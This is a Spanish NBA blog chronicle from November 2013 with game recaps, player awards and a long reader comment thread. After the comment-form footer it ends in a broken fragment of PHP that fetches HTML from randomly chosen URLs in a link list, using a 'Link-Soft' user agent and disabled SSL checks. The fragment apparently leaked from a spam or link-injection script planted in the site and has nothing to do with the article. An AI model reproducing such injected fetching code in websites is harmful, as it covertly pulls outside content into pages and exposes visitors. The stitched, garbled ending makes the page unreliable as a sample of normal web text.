La Crónica: Equipos en crisis

14 de November de 2013 por Simon

Como cada miércoles maratoniana jornada en la NBA. En esta, varios partidos con mucho morbo y expectación como el duelo Rubio-Irving, y las visitas de Rudy Gay a Memphis y de Durant y sus Thunder a LA para medirse a los nuevos Clippers de “Doc Rivers”.

Thunder y Clippers calibraban sus opciones en el partido de la jornada que se terminó llevando el equipo de Los Angeles haciendo valer su rol como local. El partido fue un continuo intercambio de golpes con ambos equipos practicando un baloncesto rápido y espectacular. Antes del descanso se organizó una tangana provocada por Ibaka y Griffin que acabó con el de los Thunder y Matt Barnes en la calle. Tras un inicio de tercer cuarto en el que Oklahoma se marchó por 10 puntos, un gran parcial de Clippers, capitaneados por Blake Griffin, les devolvió el mando que ya no abandonaron hasta el final del partido (103-111). Tercera victoria consecutiva de los angelinos ante tres equipos de Play Off lo que les permitecoger aire para afrontar los próximos partidos. En 5 días recibirán a Nets y Memphis y visitarán las canchas de Minnesota y Oklahoma City. Por su parte, los Thunder sufren su segunda derrota de la temporada que les relega a la tercera posición del Oeste tras ser adelantados por los sorprendentes Portland Trail Blazers que vencieron en un ajustado duelo a Phoenix Suns (89-90) merced a una bandeja de Damian Lillard a falta de 6 segundos.

Otro partido interesante de la jornada era la visita que rendían Irving y sus Cavs a Minnesota y el duelo generacional entre los dos mejores bases de la promoción de 2011. Realmente el partido tuvo muy poca historia puesto que los Wolves se marcharon muy pronto en el marcador gracias a un primer cuarto casi perfecto y dejaron a los Cavs a una distancia irrecuperable que no hizo más que crecer (95-124). Los Wolves no echaron de menos a un Kevin Martin, ya que Corey Brewer se convirtió en el anotador de ocasión con 27 puntos y 5/5 en el triple. Junto a “MVP” Love y Ricky Rubio formó el tridente en el los Wolves cimentaron su victoria.  Otro equipo que tuvo un partido plácido fueron los líderes del Oeste, San Antonio Spurs, que se deshicieron sin el mínimo problema de unos pírricos Wizards incapaces de superar los 80 puntos (79-92).  La escasa historia que tuvo el partido me hace quedarme sólo con dos  cosas, una que no había visto nunca y otra que no quiero volver a ver: Nunca había visto a Duncan firmar un partido tan malo como el de ayer y nunca quiero volver a ver las camisetas que estrenaban los Spurs.

Pero la crónica se titula “equipos en crisis” y no hay equipo en más crisis ahora mismo que los Brooklyn Nets. El faraónico proyecto que muchos señalaban como favoritos en la carrera por el anillo está decepcionando hasta al que no apostaba mucho por ellos. Han sido incapaces de ganar aún a domicilio, su  ataque es un desastre y su defensa está dejando mucho que desear pues casi todos los equipos superan los 100 puntos con facilidad. Ayer fueron los Kings los que, a pesar de contar poco tiempo con Cousins debido a que fue eliminado por faltas en apenas 20 minutos, no tuvieron el más mínimo problema para deshacerse de unos tristes Nets que a día de hoy no juegan a nada. De seguir así no me extrañaría que a Kidd se le acabe pronto la experiencia de ser entrenador (86-107). Otro equipo en horas bajas son los Grizzlies, que ayer recibieron un duro correctivo en casa ante los Raptors de Rudy Gay (103-87). Memphis sigue sin encontrar su ritmo de juego y a pesar del gran inicio de campaña de Mike Conley les está costando mucho sumar victorias, debido a que su defensa ya no es la de antaño y de momento, su pareja interior no marca diferencias como antes. Que no tarden mucho en reaccionar porque el tren de los Play Off puede marcharse.  Otro equipo que, aunque no esté tan mal como los dos anteriormente mencionados, no termina de carburar son los Rockets de Howard que ayer cayeron ante los Sixers tras una prórroga.  Un espectacular triple de Tony Wroten, que ante la baja de MCW fue titular y aprovechó para lograr un triple doble, forzó la prórroga en la que Philadelphia se llevó la victoria haciendo inútil el partidazo de Jeremy Lin (117-123). James Anderson fue otro que firmó un partidazo y se fue a los 36 puntos.

En el resto de partidos de la jornada,  Bobcats cortó la buena racha de Boston Celtics en un partido muy tosco y falto de acierto para afianzarse en puestos de Play Off de la mano de Al Jefferson, autor de 22 puntos y 11 rebotes (89-83); New York Knicks consiguió una victoria vital ante los Hawks para salir un poco del fondo de la conferencia y acercarse a puestos de Play Off (95-91); Denver venció a Lakers (99-111) con Pau Gasol anotando 25 puntos pero necesitando 27 intentos a canasta; Orlando rompió  su racha de derrotas ante Milwaukee (91-94) en un nuevo partidazo de Arron Afflalo, y Utah Jazz por fin consiguió su primera victoria (105-111) de la temporada aprovechando la visita de unos Pelicans que no están cumpliendo con las expectativas creadas en torno a ellos y que perfectamente podrían estar incluidos en el pack de equipos en crisis.

PREMIOS

MVP: Partidazo de Arron Afflalo que ha empezado la temporada a un ritmo tremendo. Anotó 36 puntos con 8 de 11 en triples y además aportó 8 rebotes, 6 asistencias y un par de robos. Kevin Love sigue a lo suyo y casi calcó los números de Afflalo: 33 puntos, 8 rebotes y 6 asistencias. Su compañero Ricky Rubio anotó 16 puntos, repartió 16 asistencias y además capturó 6 rebotes y robó 3 balones.

Rookie: Hoy vamos a destacar a Tim Hardaway Jr, que está dejando pinceladas interesantes en NY y a Cody Zeller.  El “hijísimo” anotó 14 puntos y el de los Bobcats cuajó una completa actuación jugando al lado de Al Jefferson: 8 puntos, 9 rebotes, 2 robos y 1 tapón.

Sorpresa: A James Anderson el aro se le convirtió en piscina y anotó casí todo lo que tiró. Finalizó con 36 puntos y un 12 de 16 en tiros de campo. Su compañero Tony Wroten sustituyó en el quinteto titular a Michael Carter-Williams y consiguió un triple doble (18-10-11). Primeras muestras del talento que se le veía en la universidad. A Jordan Hill y Khris Middleton la titularidad también les sienta muy bien. El de los Lakers fue el mejor de su equipo con 18 puntos y 15 rebotes y el de los Bucks se fue a los 19 puntos, 8 rebotes, 4 asistencias y 3 robos ante los Magic. Corey Brewer se imbuyó del espíritu del ausente Kevin Martin y anotó 5 triples de 5 intentos. Finalmente, Andrea Bargnani parece destaparse en ausencia de Tyson Chandler, 20 puntos y 11 rebotes para el italiano.

Decepción: Los Blazers se impusieron a los Suns pero no gracias a Nico Batum o a Lamarcus Aldridge. Entre ambos anotaron solo 8 de sus 29 intentos de canasta. El francés aportó además tantos rebotes como pérdidas, 3. Los Jazz ganaron a pesar del 0 de 7 de John Lucas III. ¡Que vuelva Trey Burke ya! Pero para decepción la de los Brooklyn Nets que cayeron por 21 puntos en su visita a Sacramento. Han perdido los 4 partidos que han jugado fuera de casa.

Esfuerzo en vano: Jeremy Lin y Dwight Howard lo dieron todo en la pista pero su esfuerzo no obtuvo recompensa ante los Sixers. Ni los 34 puntos y 12 asistencias del base ni los 23 puntos, 15 rebotes, 6 asistencias y 6 tapones del pívot.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

39 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Pues si te quejas de las camisetas de los Spurs ojo a las camisetas especiales con mangas para Navidad,horrible es una palabra que se queda corta.

    A pesar de la teórica buena pinta que tenían los Cavaliers antes de empezar la temporada,con el paso de los partidos han ido rompiendo la tela que les cubría esa idílica imagen,y demuestran son un equipo quizás mal configurado para el base que tienen.Deberían rodear a Irving de tiradores y si acaso contar con un buen referente interior(en teoría lo tienen pero las lesiones),con la premisa de que todos ellos deben tener una buena base defensiva.Mismamente Afflalo sería un fit cojonudo para ellos,aunque Orlando no necesita para nada a Waiters,pero bueno,como ejemplo.

    De todas formas,hasta ahora se libran de la categoría de flop de la temporada.El ranking sería: Wizards = Memphis < NOLA <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< Nets

    11 rebotes para Bargnani…."I believe I can fly!"

      Citar

  2. arvydas dice:
    #2

    En el partido de los Lakers, Timofey Mozgov 23 puntos 9 rebotes.
    Iker Jimenez lo comentara en el programa del domingo

      Citar

  3. nba dice:
    #3

    arvydas:
    En el partido de los Lakers, Timofey Mozgov 23 puntos 9 rebotes.
    Iker Jimenez lo comentara en el programa del domingo

    tiene explicacion, en los Lakers juega un ET que esta en horas bajisimas …
    Respecto a la expulsion de Ibaka y Barnes, alguien duda ya a estas alturas de que Griffin tiene bula papal…

      Citar

  4. Esteban dice:
    #4

    que no confundan los números de Barganani, vi el partido ayer y si bien tomo algunos rebotes largos poco peleados y lazo bastante bien, puedo decir que nunca había visto a un jugador defender asi, bah “defender”, pararse en defensa de forma tan distraida, falto de intensidad y compromiso como el italiano

    si fuera woodson preferiría poner a Martin de centro titular y e centro suplente Metta Wolrd Peace, seguramente lucharía mas que el italiano

      Citar

  5. Esteban dice:
    #5

    los clippers demostraron ayer las carencias del Thunder de a momento

    CP3 esta en modo all-star, griffin se mantienen en su radio mas que habitual de entre 17 y 23 puntos, y paul hasta transformo a Jordan en una amenaza ofensiva con esos pases
    todavia tiene a Crawford desde el banco aunque algo solo, sigue sin ver accionar Jamision, Mullens parecido, y Dudley 1-5 en triples, pero aun asi hoy son mas equipo que el thunder

    Durant y westbrook estan extrañando a su tercer espada, que hoy por hoy, no es reggie jackson a pesar de todo lo bueo que es, y tampoco es jeremy lamb a pesar de sus progresos, si a eso le sumamos que sale de la cancha ibaka, el thunder es un equipo muy desmembrado

    por que jugo adams de titular ayer? Brooks se canso de Perkins o esta lesionado?

      Citar

  6. Esteban dice:
    #6

    ninguan mencion en el esfuerzo en vano para Anthony Davis y sus 29 puntos, 15 rebotes, 1 robo y un 1 tapon?

      Citar

  7. Esteban dice:
    #7

    no quiero generar mas polemica, pero nombre a rubio entre los MVP por sus 16 puntos y 16 asistencias en el baile total que le dieron los wolves a los cavs y no nombrar a Graivis Vasquez con sus 17 puntos y 12 asistencias mas un +22 mientras esutvo en cancha en la sorpresiva victoria de los Kings, es minimamente extraño

      Citar

  8. Jose Luis dice:
    #8

    Yo creo que hoy la crónica iba escasa de premios, sinceramente.

    No es que se saltasen a algunos sí y otros no por conveniencia. Habría poco tiempo y se han puesto pocos. Aunque es cierto que Rubio chirría cuando ya se había puesto a Love.

    ¡Queremos explicaciones Simón! 😀

      Citar

  9. rumbero dice:
    #9

    Ruxixón:
    A pesar de la teórica buena pinta que tenían los Cavaliers antes de empezar la temporada,con el paso de los partidos han ido rompiendo la tela que les cubría esa idílica imagen,y demuestran son un equipo quizás mal configurado para el base que tienen.Deberían rodear a Irving de tiradores y si acaso contar con un buen referente interior(en teoría lo tienen pero las lesiones),con la premisa de que todos ellos deben tener una buena base defensiva.Mismamente Afflalo sería un fit cojonudo para ellos,aunque Orlando no necesita para nada a Waiters,pero bueno,como ejemplo.

    No andan demasiado bien. El mayor problema puede ser que al fin y al cabo es un equipo que depende mucho de que Irving esté a un nivel sobresaliente. Brown se ha centrado en dar al equipo una sólida base defensiva y lo cierto es que hasta hoy que les han pasado por encima era uno de los equipos que menos puntos encajaba. Pero en ataque se fía todo al talento de Kyrie, y el chaval no ha empezado bien. Si además Bynum no está para más de 15 minutos y sin jugar back to backs y Varejao no vuelve al nível extrarrestre de la anterior campaña la cosa se les complica. Coincido en que un tirador les vendría fenomenal. Lo que les salva hasta el momento es sólo han jugado 3 partidos en casa, que de hecho son los que han ganado.
    Y lo de los Wolves es canela fina. Una maravilla verlos jugar a este ritmo. El primer cuarto es tremendo, con Ricky de motor e involucrado en 30 de los 38 puntos del equipo. Y que fichajazo Brewer. Ahora mismo son el equipo a ver para disfrutar un buen rato, como cuando uno tiempo atrás se ponía a los Kings de inicios del 2000…oh wait!

      Citar

  10. Esteban dice:
    #10

    Jose Luis:
    Yo creo que hoy la crónica iba escasa de premios, sinceramente.

    No es que se saltasen a algunos sí y otros no por conveniencia. Habría poco tiempo y se han puesto pocos. Aunque es cierto que Rubio chirría cuando ya se había puesto a Love.

    ¡Queremos explicaciones Simón!

    es cierto, muchisimos juegos hubo, perdon simon

      Citar

  11. rumbero dice:
    #11

    Esteban:
    no quiero generar mas polemica, pero nombre a rubio entre los MVP por sus 16 puntos y 16 asistencias en el baile total que le dieron los wolves a los cavs y no nombrar a Graivis Vasquez con sus 17 puntos y 12 asistencias mas un +22 mientras esutvo en cancha en la sorpresiva victoria de los Kings, es minimamente extraño

    Nada, Vasquez a mitad del tercer cuarto y con el equipo 20 arriba llevaba 9 puntos y 6 asistencias. Lo que viene después es inflar números

      Citar

  12. Esteban dice:
    #12

    los wolves son hoy un muy buen equipo, pero lo que mas ilusiona es lo bueno que pueden ser promediando la temporada, pues tienen margen para realizar cambios

    he oido que estan en el mercado Shved y Williams, ambos jovenes, con buenos contratos y un buen cartel en la liga, si puedieran transformar a ambos en arron afflalo, quien tambien deberia estar en el mercado, la cosa se puede poner buena buena

    hasta muhammed, con ese irrisorio contrato puede servir de una buena moneda de cambio, varios equipos pueden estar interesados en el

    tambien los veo medio cojos con turiaf de recambio de pekovic, pero todo no se puede

    hoy tienen un duelo con los nuggets que deberian ganar con la misma facilidad que han ganado a los equipos inferiores a ellos

      Citar

  13. HisRoyalAirness dice:
    #13

    Esteban:
    no quiero generar mas polemica, pero nombre a rubio entre los MVP por sus 16 puntos y 16 asistencias en el baile total que le dieron los wolves a los cavs y no nombrar a Graivis Vasquez con sus 17 puntos y 12 asistencias mas un +22 mientras esutvo en cancha en la sorpresiva victoria de los Kings, es minimamente extraño

    Mira, te voy a pegar lo que escribí en el hilo de ayer mientras veía el partido:

    “Ricky Rubio 9 puntos, 2 rebotes, 8 asistencias y 1 robo en el primer cuarto.

    Vaya pufo”

    La causa de que los Wolves le metieran 70 puntos en la primera parte a los Cavaliers fue Ricky Rubio, así como la causa de que Corey Brewer hicieses esos números. 6 de las asistencias son para triples (18 puntos) y, aunque no me guste poner mayúsculas quiero enfatizar: NO JUGÓ EL ÚLTIMO CUARTO.

    Así que o ponte el partido o deja de decir tonterías

      Citar

  14. Esteban dice:
    #14

    HisRoyalAirness: Mira, te voy a pegar lo que escribí en el hilo de ayer mientras veía el partido:

    “Ricky Rubio 9 puntos, 2 rebotes, 8 asistencias y 1 robo en el primer cuarto.

    Vaya pufo”

    La causa de que los Wolves le metieran 70 puntos en la primera parte a los Cavaliers fue Ricky Rubio, así como la causa de que Corey Brewer hicieses esos números. 6 de las asistencias son para triples (18 puntos) y, aunque no me guste poner mayúsculas quiero enfatizar: NO JUGÓ EL ÚLTIMO CUARTO.

    Así que o ponte el partido o deja de decir tonterías

    no vi el partido, pero si miras el game racap de nba.com, se ven varias asistencias de rubio lujosas y muy lindas con el partido 98 a 70, entre otros resultados que recuerdo, con la cosa muy despareja y el equipo rivel casi sin defender

    luego del primer cuarto el partido estaba casi definido, asi que sumo el doble de asistencias cuando la cosa estaba definida…

      Citar

  15. Esteban dice:
    #15

    rumbero: Nada, Vasquez a mitad del tercer cuarto y con el equipo 20 arriba llevaba 9 puntos y 6 asistencias. Lo que viene después es inflar números

    no se que partido viste, pero si hablamos de kings y Nets, la diferencia fue de 7 u 9 puntos hasta las 5 minutos del ultimo cuarto, donde una corrida elevo la diferencia a mas 10 y sobre el final se temrino liquidando por mas, pero lejos estuvo el partido de estar 20 arriba los kings, a menos de q hables de otro juego

      Citar

  16. Esteban dice:
    #16

    ojo que no me desagrada rubio, pero WROTEN ayer se pinto un triple doble en su primer juego de titular en la lig ay sirvio para una victoria en suplementario contrauna potencia como Rockets, y aqui se pone como MVP a riicky en una paliza que le dieron los wolves a los cavs, cuando el otro dia el triple doble de ricky hasta amerito una burla para denisa en el post

    solo pongo de resalto que aqui se sobredimensiona a ciertos jugadores, y personalmente en el caso de rubio es por su nacionalidad

      Citar

  17. rumbero dice:
    #17

    Esteban: no se que partido viste, pero si hablamos de kings y Nets, la diferencia fue de 7 u 9 puntos hasta las 5 minutos del ultimo cuarto, donde una corrida elevo la diferencia a mas 10 y sobre el final se temrino liquidando por mas, pero lejos estuvo el partido de estar 20 arriba los kings, a menos de q hables de otro juego

    No si yo el partido no lo vi, pero como está de moda lo de valorar a los jugadores tirando de boxscore me he animado yo también. Y vaya, a no ser que nba.com me mienta veo que a mitad del segundo cuarto iban 41-23, a mitad del tercero 66-45 y que lo más que se acercan los Nets en el último cuarto es a 13 puntos. A ver si te equivocaste tu de partido…

      Citar

  18. txusma dice:
    #18

    Los premios los hago yo cada día y no sabía que se seguían con tanto interés. 😀

    Tony Wroten hizo triple-doble pero se cascó un 7 de 18 en tiros de campo y perdió 4 bolas. Por mucho triple-doble que sea, los 16-6-16 y 3 robos con un 5 de 7 en tiros de campo de Ricky, me parecen mejores números aquí y en Singapur. Además, el de los Sixers jugó 10 minutos más.

    Y en el Mayor Esfuerzo en vano podría haber nombrado a Anthony Davis y Kevin Durant pero he preferido quedarme con la pareja de los Rockets.

    Si me he olvidado de algo es de Mozgov y de poner a Gasol en decepción pq tirar 27 veces…

      Citar

  19. HisRoyalAirness dice:
    #19

    Esteban, en serio, lo tuyo no es normal. Deja de decir lo de la nacionalidad porque a mí, personalmente, me ofende semejante estupidez.
    El argumento de que estaba el partido decidido es absurdo porque, precisamente, si estaba decidido fue por él. Todos criticamos su falta de consistencia en el tiro como criticamos ahora a Pau o a cualquiera que se ponga por delante, sea de donde sea.
    Y por mucho que te joda, porque parece que el que sea español al que te afecta es a ti, ayer salen de sus manos 44 puntos de su equipo. Sin jugar el último cuarto, repito

      Citar

  20. Esteban dice:
    #20

    Siguen perdiendo de vista el contexto, si bien ricky jugo bien, repito, ningun wolves transpito mucho para ganar ayer, el partido se presento demasiado facil y eso es lo q cuenta

    Ante de ayer el partido ue mas duro y el rendimiento de rubio decayo a diferencia del de love por ej

    Pero l parecer todos los partidos se presentan igual y los numeros valen lo mismo en una paliza o mas que los numeros de un partido q se va a prorroga y q unos pesimos 76 ers le ganan a unos candidatos como los rockets

    Al final de la temporada contamos en este blog las enciones q cada jugador tuvo como mvp de la jornada y ahi para mi gusto ricky se a robado una mencion

      Citar

  21. Esteban dice:
    #21

    En todo caso CPT tambien repartio 16 asistencias en un durisimo choque de candidatos y en una muy meritoria victoria frente al thunder y el no tiene mencion como mvp y ricky si

    Enserio les parece justo?

      Citar

  22. Schize dice:
    #22

    Cp3 anotó los mismos lanzamientos que Rubio tirando 8 más, falló todos los tiros que intentó y tuvo un +10 de aportación por el +22 de Rubio, jugando 10 minutos más. No niego que el rival fuera más fuerte, indudablemente, pero la aportación de cada uno está ahí y es mejor la del español.
    Sinceramente, Esteban, hay ciertos jugadores (Rubio, Griffin, etc.) que tienes cruzados y no los puedes ni ver, pero esta guerra de tal no merece estar entre los destacados, éste es mejor que el otro, etc. no te lleva a ningún lado, lo único que consigues es marear al personal. Es normal que cada uno tenga sus opiniones, y los que redactan las crónicas tienen todo el derecho del mundo a dar su opinión y destacar a quién consideren oportuno. Encima que las hacen gratuitamente para el resto, encima tendremos que estar taladrando todo el tiempo con tonterías. Venga va..

      Citar

  23. Schize dice:
    #23

    Cuando digo que CP3 falló todos los tiros que intentó, me refiero a triples. Perdón por el fallo.

      Citar

  24. Denise dice:
    #24

    Tremendo Afflalo, la de novias que le van a salir en febrero..¿he oido Thunder, Bulls? .
    El que no está bien ultimamente es Oladipo, la verdad es que MCW le está ganando claramente el ROY de momento.
    Y quisiera destacar en Orlando a Kyle O’Quinn, me encanta esos jugadores como él ó como Reggie Evans que nunca van a acaparar portadas ni focos pero que en los pocos minutos que juegan se emplean con una intensidad del 200% dando una gran productividad y haciendo ese juego subterraneo que poco se valora pero que tanta falta le hace a un equipo.

      Citar

  25. Viva_Dirk dice:
    #25

    O’Quinn me parece mejor jugador que Evans de aquí a Lima, es mucho mas inteligente y mejor técnicamente, un gran jugador de segunda unidad.

    Afflalo si que pinta que acaba en algun equipo de la zona alta, desde luego a los Thunders les vendria genial.

      Citar

  26. Sancho88 dice:
    #26

    Schize:
    Cp3 anotó los mismos lanzamientos que Rubio tirando 8 más, falló todos los tiros que intentó y tuvo un +10 de aportación por el +22 de Rubio, jugando 10 minutos más. No niego que el rival fuera más fuerte, indudablemente, pero la aportación de cada uno está ahí y es mejor la del español.
    Sinceramente, Esteban, hay ciertos jugadores (Rubio, Griffin, etc.) que tienes cruzados y no los puedes ni ver, pero esta guerra de tal no merece estar entre los destacados, éste es mejor que el otro, etc. no te lleva a ningún lado, lo único que consigues es marear al personal. Es normal que cada uno tenga sus opiniones, y los que redactan las crónicas tienen todo el derecho del mundo a dar su opinión y destacar a quién consideren oportuno. Encima que las hacen gratuitamente para el resto, encima tendremos que estar taladrando todo el tiempo con tonterías. Venga va..

    Por este tipo de cosas algunos hemos dejado de escribir comentarios en el blog… la demagocia de este señor roza lo absurdo

      Citar

  27. Sancho88 dice:
    #27

    demagogia

      Citar

  28. HisRoyalAirness dice:
    #28

    Sancho88: Por este tipo de cosas algunos hemos dejado de escribir comentarios en el blog… la demagocia de este señor roza lo absurdo

    Sancho te refieres a algo que dice Schize en el comentario que citas? Es que no veo nada extraño, por eso pregunto

      Citar

  29. Viva_Dirk dice:
    #29

    Se refiere a Esteban con total seguridad.

      Citar

  30. diestro dice:
    #30

    Nooooooo, no dejéis de escribir nunca jajaja. Que seria de nosotros? Me encanta este blog por el nivelazo que tiene, y el nivelado de los comentarios. Los de Esteban tambien. Lo único que las discusiones sobre preferencias personales tendrían que tener otro tono. Para mi nas crónicas son bastante objetivas, por lo menos mil veces mas que cualquier otro medio que se hace llamar serio. Vamos que entro en Marca, As, Espn en español, etc) y la única duda que me queda es saber que seria de esta web con la pasta para promoción qure tiene cualquiera de estas.

    Seguir escribiendo y discutiendo para que algunos podamos aprender. Gracias

      Citar

  31. HisRoyalAirness dice:
    #31

    Viva_Dirk:
    Se refiere a Esteban con total seguridad.

    Sí, ya me pareció después de leerlo otra vez (por cierto, enhorabuena por pasar a Jerry West!)

      Citar

  32. Mamba_Blanca dice:
    #32

    Llevo años siguiendo el blog, he leido y releido discusiones de todo tipo (como aquellas batallas encarnizadas por quien era el mejor PF de la historia) y todas han sido un placer, ya que a diferencia de otros lugares, aqui la gente entiende, valora y despues habla; como en todo en esta vida se tienen preferencia (Denise y Nelson) pero Esteban, aqui no hay nacionalismo de ningún tipo, si el partido de Ricky es malo se critica, si es bueno se alaba y al igual con todos los españoles que hay en la NBA.

    En el momento que en una cronica leyeses “Talismán Claver”, “Pau ejerce de Kobe”, “El odio de Carlise a Calderon” o algo similar, te invito a que llames a los redactores de las cronicas nacionalistas porque ademas contarias con todo mi apoyo.

    Hasta ese momento veo sin fundamento tu argumentación.

      Citar

  33. Esteban dice:
    #33

    Viva_Dirk:
    Se refiere a Esteban con total seguridad.

    para mi??????????? si ese comentario es para mi sin dudas ha equivocado la palabra que utilizo, pues demagogia significa:

    Demagogia (del griego ????? -d?mos-, pueblo y ????? -agein-, dirigir) es una estrategia utilizada para conseguir poder político. Consiste en apelar a prejuicios, emociones, miedos y esperanzas del público para ganar apoyo popular, frecuentemente mediante el uso de la retórica y la propaganda.

    mis comentario, lejos de intentar ser populares, o intentar ganar a apoyo en este blog, son todo lo contrario, incluso podrian tildarse de antidemagogo, no? si fue dirigido a mi, quiza debio haberme citado a mi, seria lo logico,

    ese comentario citado, tildado de demagogia, da la impresion de dirigirse a quien lo hizo, que agrade en publico a quienes hacen el blog, cualquier profesor de lengua lo entenderia asi

    repito, quiza va dirigido para mi pero la palabra no era demagogia sin dudas, sancho88 seguramente lo aclarara, pero a simple vista no lo veo dirigido a mi…

      Citar

  34. Esteban dice:
    #34

    en subsidio, ya lo aclarara sancho88, pero uno de sus ultimos comentarios lo hizo en el articulo que trataba a Blake Griffin que hizo yo mismo… quiza cambio de opinion en estas ultimas semanas

      Citar

  35. Schize dice:
    #35

    Esteban: para mi??????????? si ese comentario es para mi sin dudas ha equivocado la palabra que utilizo, pues demagogia significa:

    Demagogia (del griego ????? -d?mos-, pueblo y ????? -agein-, dirigir) es una estrategia utilizada para conseguir poder político. Consiste en apelar a prejuicios, emociones, miedos y esperanzas del público para ganar apoyo popular, frecuentemente mediante el uso de la retórica y la propaganda.

    mis comentario, lejos de intentar ser populares, o intentar ganar a apoyo en este blog, son todo lo contrario, incluso podrian tildarse de antidemagogo, no? si fue dirigido a mi, quiza debio haberme citado a mi, seria lo logico,

    ese comentario citado, tildado de demagogia, da la impresion de dirigirse a quien lo hizo, que agrade en publico a quienes hacen el blog, cualquier profesor de lengua lo entenderia asi

    repito, quiza va dirigido para mi pero la palabra no era demagogia sin dudas, sancho88 seguramente lo aclarara, pero a simple vista no lo veo dirigido a mi…

    Sinceramente, no se qué profesor de lengua lo entendería de esa manera. Me gustaría que me contaras en que parte de mi comentario agredo a los escritores de este blog, porque vamos, bajo mi criterio es una defensa e incluso agradecimiento por su trabajo.
    Yo supongo que Sancho88 se refiere a Esteban, pero vamos, si no es así querría saber por qué soy yo demagogo xD

      Citar

  36. Esteban dice:
    #36

    Lo unuico q voy a decir q yo soy cualquier cosa menos demagogo, o popular
    De hecho soy el antipopular del blog

    Estais de acuerdo no? Jajaj

      Citar

  37. Pop dice:
    #37

    Para ya, Esteban. Ese papel que estás tomando del que va a contracorriente está enrareciendo el ambiente. Este sitio es uno de los blogs/foros más frescos y sanos que conozco. Siempre ha habido debate, y posturas encontradas, pero para nada guerra de bandos, datos lanzados a la cara a cada partido, etc . Lo tuyo empieza a ser postureo. No se trata de que no puedas opinar lo que tú quieras, faltaría más, se trata de que no defender columpiadas ni estar a cada rato machacando con lo mismo. Ya está bien.

    Sancho, tío, vuelve más por aquí hombre. Se te echa de menos!

      Citar

  38. dunc dice:
    #38

    Por mi parte, nunca o casi nunca escribo pero os leo tooodos los días asi que os animo a que sigais con los comentarios como hasta hace un par de días. De hecho los comentarios me parece de lo más interesante del blog.

    La pseudoguerra esta que os llevais no tiene sentido. (perdonad que me meta donde no me llaman)

      Citar

  39. Nico dice:
    #39

    dunc:
    Por mi parte, nunca o casi nunca escribo pero os leo tooodos los días asi que os animo a que sigais con los comentarios como hasta hace un par de días. De hecho los comentarios me parece de lo más interesante del blog.

    La pseudoguerra esta que os llevais no tiene sentido. (perdonad que me meta donde no me llaman)

    Agree

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>